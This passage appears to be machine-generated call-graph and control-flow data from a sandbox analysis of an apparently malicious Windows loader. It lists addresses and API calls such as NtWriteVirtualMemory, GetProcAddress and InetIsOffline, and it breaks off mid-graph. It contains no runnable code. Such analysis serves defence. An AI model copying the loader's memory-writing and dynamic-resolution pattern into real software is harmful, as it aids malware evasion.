RegQueryValueExA 25461 2b85b40 RegQueryValueExA 25459->25461 25462 2b85b5e RegCloseKey 25459->25462 25460->25452 25461->25462 25462->25452 25464 2b85bcb lstrlenA 25466 2b85be3 25464->25466 25465->25460 25465->25464 25466->25460 25467 2b85c08 lstrcpynA LoadLibraryExA 25466->25467 25468 2b85c30 25466->25468 25467->25468 25468->25460 25469 2b85c3a lstrcpynA LoadLibraryExA 25468->25469 25469->25460 25470 2b85c6c lstrcpynA LoadLibraryExA 25469->25470 25470->25460 25471->25459 25472 2babb44 25475 2b9ec74 25472->25475 25476 2b9ec7c 25475->25476 25476->25476 28656 2b9870c LoadLibraryW 25476->28656 25478 2b9ec9e 28661 2b82ee0 QueryPerformanceCounter 25478->28661 25480 2b9eca3 25481 2b9ecad InetIsOffline 25480->25481 25482 2b9ecc8 25481->25482 25483 2b9ecb7 25481->25483 25484 2b84500 11 API calls 25482->25484 28673 2b84500 25483->28673 25486 2b9ecc6 25484->25486 28664 2b8480c 25486->28664 28679 2b980c8 28656->28679 28658 2b98745 28690 2b97d00 28658->28690 28662 2b82ef8 GetTickCount 28661->28662 28663 2b82eed 28661->28663 28662->25480 28663->25480 28665 2b8481d 28664->28665 28666 2b8485a 28665->28666 28667 2b84843 28665->28667 28669 2b84570 11 API calls 28666->28669 28668 2b84b78 11 API calls 28667->28668 28671 2b84850 28668->28671 28669->28671 28670 2b8488b 28671->28670 28672 2b84500 11 API calls 28671->28672 28672->28670 28674 2b84504 28673->28674 28675 2b84514 28673->28675 28674->28675 28677 2b84570 11 API calls 28674->28677 28676 2b84542 28675->28676 28764 2b82c2c 11 API calls 28675->28764 28676->25486 28677->28675 28680 2b84500 11 API calls 28679->28680 28681 2b980ed 28680->28681 28704 2b97914 28681->28704 28685 2b98107 28686 2b9810f GetModuleHandleW GetProcAddress GetProcAddress 28685->28686 28687 2b98142 28686->28687 28725 2b844d0 28687->28725 28691 2b84500 11 API calls 28690->28691 28692 2b97d25 28691->28692 28693 2b97914 12 API calls 28692->28693 28694 2b97d32 28693->28694 28695 2b84798 11 API calls 28694->28695 28696 2b97d42 28695->28696 28753 2b98020 28696->28753 28699 2b980c8 15 API calls 28700 2b97d5b NtWriteVirtualMemory 28699->28700 28701 2b97d87 28700->28701 28702 2b844d0 11 API calls 28701->28702 28703 2b97d94 FreeLibrary 28702->28703 28703->25478 28705 2b97925 28704->28705 28729 2b84b78 28705->28729 28707 2b979a1 28710 2b84798 28707->28710 28708 2b97935 28708->28707 28738 2b8ba44 CharNextA 28708->28738 28711 2b8479c 28710->28711 28712 2b847fd 28710->28712 28713 2b847a4 28711->28713 28714 2b84500 28711->28714 28713->28712 28716 2b84500 11 API calls 28713->28716 28719 2b847b3 28713->28719 28717 2b84570 11 API calls 28714->28717 28720 2b84514 28714->28720 28715 2b84542 28715->28685 28716->28719 28717->28720 28718 2b84570 11 API calls 28722 2b847cd 28718->28722 28719->28718 28720->28715 28751 2b82c2c 11 API calls 28720->28751 28723 2b84500 11 API calls 28722->28723 28724 2b847f9 28723->28724 28724->28685 28727 2b844d6 28725->28727 28726 2b844fc 28726->28658 28727->28726 28752 2b82c2c 11 API calls 28727->28752 28731 2b84b85 28729->28731 28737 2b84bb5 28729->28737 28732 2b84bae 28731->28732 28734 2b84b91 28731->28734 28740 2b84570 28732->28740 28733 2b84b9f 28733->28708 28739 2b82c44 11 API calls 28734->28739 28745 2b844ac 28737->28745 28738->28708 28739->28733 28741 2b84598 28740->28741 28742 2b84574 28740->28742 28741->28737 28749 2b82c10 11 API calls 28742->28749 28744 2b84581 28744->28737 28746 2b844cd 28745->28746 28747 2b844b2 28745->28747 28746->28733 28747->28746 28750 2b82c2c 11 API calls 28747->28750 28749->28744 28750->28746 28751->28715 28752->28727 28754 2b84500 11 API calls 28753->28754 28755 2b98043 28754->28755 28756 2b97914 12 API calls 28755->28756 28757 2b98050 28756->28757 28758 2b98058 GetModuleHandleA 28757->28758 28759 2b980c8 15 API calls 28758->28759 28760 2b98069 GetModuleHandleA 28759->28760 28761 2b98087 28760->28761 28762 2b844ac 11 API calls 28761->28762 28763 2b97d55 28762->28763 28763->28699 28764->28676

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 2b9ec74-2b9ec77 1 2b9ec7c-2b9ec81 0->1 1->1 2 2b9ec83-2b9ecb5 call 2b9870c call 2b82ee0 call 2b82f08 InetIsOffline 1->2 9 2b9ecc8-2b9ecd2 call 2b84500 2->9 10 2b9ecb7-2b9ecc6 call 2b84500 2->10 13 2b9ecd7-2b9ef9a call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9eb94 9->13 10->13 115 2baaa2a-2baafa0 call 2b844d0 * 5 call 2b84c0c call 2b844ac call 2b84c0c call 2b844d0 call 2b844ac call 2b844d0 * 2 call 2b84c0c call 2b844d0 * 2 call 2b844ac call 2b844d0 call 2b844ac call 2b844d0 * 2 call 2b84c0c call 2b844d0 call 2b84c0c call 2b844d0 * 4 call 2b84c0c call 2b844ac call 2b84c0c call 2b844d0 * 2 call 2b844ac call 2b844d0 call 2b84c24 call 2b844d0 call 2b84c24 call 2b844d0 call 2b84c0c call 2b844ac call 2b84c0c call 2b844d0 * 2 call 2b844ac call 2b84c0c call 2b844ac call 2b84c0c call 2b844d0 call 2b84c0c call 2b844ac call 2b84c0c call 2b844d0 call 2b84c0c call 2b844ac call 2b84c0c call 2b844d0 call 2b84c0c call 2b844ac call 2b84c0c call 2b844d0 * 2 call 2b84c0c call 2b844ac call 2b84c0c call 2b844d0 * 2 call 2b844ac call 2b844d0 call 2b85788 call 2b844d0 call 2b844ac call 2b844d0 * 2 call 2b8e37c call 2b844d0 call 2b85e58 call 2b844d0 * 4 call 2b85788 call 2b844d0 call 2b85788 call 2b844d0 call 2b84c0c call 2b844d0 call 2b84c0c call 2b844ac call 2b844d0 call 2b844ac call 2b844d0 call 2b85788 call 2b844d0 call 2b84c0c call 2b844d0 * 4 call 2b844ac call 2b844d0 13->115 116 2b9efa0-2b9efa7 call 2b9ebf0 13->116 116->115 122 2b9efad-2b9f8ce call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b98954 call 2b8494c call 2b846a4 call 2b9df38 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84798 call 2b87e18 116->122 592 2b9f9e1-2b9faf4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9df38 call 2b84500 122->592 593 2b9f8d4-2b9f9dc call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84500 122->593 655 2b9faf9-2b9fc21 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8c2ec call 2b84500 592->655 593->655 688 2b9fc28-2b9ffe9 call 2b849ac call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9df38 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8494c call 2b846a4 call 2b87e18 655->688 689 2b9fc23-2b9fc26 655->689 800 2ba07ab-2ba0d83 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84d8c call 2b9dbb0 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9e08c call 2b857c4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84500 * 2 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9e014 688->800 801 2b9ffef-2ba0444 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84d8c call 2b9dbb0 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9e08c call 2b857c4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84500 call 2b9e014 688->801 689->688 1056 2ba1f85-2ba2188 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 800->1056 1187 2ba0d89-2ba12b8 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b87a88 call 2b9e618 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9e08c call 2b857c4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 800->1187 1055 2ba044a-2ba07a6 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8494c call 2b84d20 call 2b9dbb0 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 801->1055 801->1056 1055->1056 1226 2ba218a-2ba218d 1056->1226 1227 2ba218f-2ba2194 1056->1227 1539 2ba12c2-2ba14d7 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9e2f8 1187->1539 1226->1227 1227->115 1229 2ba219a-2ba242d call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b87a88 call 2b9e618 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 1227->1229 1416 2ba2432-2ba2a3e call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9e5b4 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84734 call 2b9e08c call 2b857c4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84500 * 13 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8494c call 2b846a4 1229->1416 1779 2ba2a44 call 2b87e3c 1416->1779 1661 2ba14dd-2ba1554 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 1539->1661 1662 2ba1f72-2ba1f7f 1539->1662 1690 2ba1559-2ba15e6 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9e4b8 1661->1690 1662->1056 1662->1539 1690->1662 1724 2ba15ec-2ba16df call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 1690->1724 1780 2ba16e4-2ba1707 CoInitialize call 2b8480c 1724->1780 1781 2ba2a49-2ba2a4b 1779->1781 1785 2ba170c-2ba1756 call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 1780->1785 1783 2ba2a51-2ba2be2 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8494c call 2b846a4 call 2b87fd0 1781->1783 1784 2ba2be7-2ba2cf2 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 1781->1784 1783->1784 1871 2ba2cf9-2ba2f11 call 2b849ac call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84898 1784->1871 1872 2ba2cf4-2ba2cf7 1784->1872 1815 2ba175b-2ba1762 call 2b98824 1785->1815 1821 2ba1767-2ba17de call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 1815->1821 1863 2ba17e3-2ba17ee call 2b96d50 1821->1863 1869 2ba17f3-2ba186e call 2b92820 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 1863->1869 1911 2ba1873-2ba187a call 2b98824 1869->1911 2013 2ba4c78-2ba54ca call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9e1d8 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b87a88 call 2b9e618 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9e540 call 2b9e5b4 call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84898 1871->2013 2014 2ba2f17-2ba3359 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b87e18 1871->2014 1872->1871 1918 2ba187f-2ba18f6 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 1911->1918 1948 2ba18fb-2ba1913 call 2b8e384 1918->1948 1953 2ba1918-2ba1986 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 1948->1953 1976 2ba198b-2ba1992 call 2b98824 1953->1976 1980 2ba1997-2ba1a0e call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 1976->1980 2008 2ba1a13-2ba1a1f call 2b8e384 1980->2008 2012 2ba1a24-2ba1a92 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 2008->2012 2048 2ba1a97-2ba1a9e call 2b98824 2012->2048 2659 2ba6cb8-2ba6f33 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84898 2013->2659 2660 2ba54d0-2ba5515 call 2b8480c call 2b8494c call 2b846a4 call 2b87e18 2013->2660 2377 2ba335b-2ba33b1 call 2b9e198 call 2b84d8c call 2b84734 call 2b84d8c call 2b9dacc 2014->2377 2378 2ba33b6-2ba3a65 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9870c call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b84798 call 2b8494c call 2b97b98 call 2b987a0 call 2b8480c call 2b8494c call 2b84798 call 2b8494c call 2b97b98 call 2b987a0 call 2b9870c call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b87e18 2014->2378 2055 2ba1aa3-2ba1b1a call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 2048->2055 2096 2ba1b1f-2ba1b43 call 2b8e384 call 2b91770 2055->2096 2109 2ba1b48-2ba1bb3 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 2096->2109 2144 2ba1bb8-2ba1bbf call 2b98824 2109->2144 2151 2ba1bc4-2ba1c2f call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 2144->2151 2186 2ba1c34-2ba1c61 call 2b98824 CoUninitialize call 2b8480c 2151->2186 2199 2ba1c66-2ba1d50 call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 2186->2199 2279 2ba1d52-2ba1d55 2199->2279 2280 2ba1d57-2ba1d5c 2199->2280 2279->2280 2280->1662 2283 2ba1d62-2ba1f6d call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9eb3c call 2b84500 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 2280->2283 2283->1662 2377->2378 2903 2ba3aad-2ba3c74 call 2b9870c call 2b9e540 call 2b84798 call 2b8494c call 2b846a4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9870c call 2b87e18 2378->2903 2904 2ba3a67-2ba3aa8 call 2b84d8c * 2 call 2b84734 call 2b9dacc 2378->2904 2879 2ba7a68-2ba7c67 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84898 2659->2879 2880 2ba6f39-2ba758b call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84798 call 2b8494c call 2b98410 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8494c call 2b846a4 call 2b9ac38 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b836a0 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 2659->2880 2660->2659 2688 2ba551b-2ba5c31 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 